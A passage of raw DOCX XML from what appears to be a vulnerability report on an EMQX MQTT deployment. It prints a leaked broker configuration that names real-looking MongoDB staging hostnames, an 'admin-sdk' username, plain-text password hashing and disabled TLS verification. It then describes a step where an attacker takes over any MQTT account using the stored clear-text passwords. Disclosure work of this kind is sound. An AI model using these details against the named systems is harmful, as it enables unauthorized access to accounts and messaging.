        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"DqnAek[...]ywUYsA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password_hash_algorithm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"plain"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"salt_position"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"disable "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password_hash_field"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"pool_size"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:8,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"r_mode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"master"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"replica_set_name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"atlas-9o3lk4-shard-0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"salt_field"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"salt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"servers"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"staging-shard-00-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>00.whqu3.mongodb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.net:27017,staging-shard-00-01.whqu3.mongodb.net:27017,staging-shard-00-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>02.whqu3.mongod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b.net:27017"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"srv_record"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ssl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ciphers"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"depth"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:10,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"enable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"reuse_ses sions"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"secure_renegotiate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"user_lookup_fun"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"emqx_tls_psk:lookup"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"verify"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"verify_none"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"versions"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"tlsv1.3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"tlsv1.2"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"tlsv1.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"tlsv1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"topology"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"connect_ timeout_ms"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"20s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"max_overflow"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:0,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"pool_size"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:8},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"admin-sdk"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"w_mode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"safe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Arbitrary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once MongoDB admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>step,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>trivially take over any MQTT user account leveraging the clear-text passwords stored in the MongoDB. Please note this allows unauthenticated attackers to send and receive any MQTT message, as well as subscribe to topics and publish messages to topics.</w:t>
      </w:r>
    </w:p>
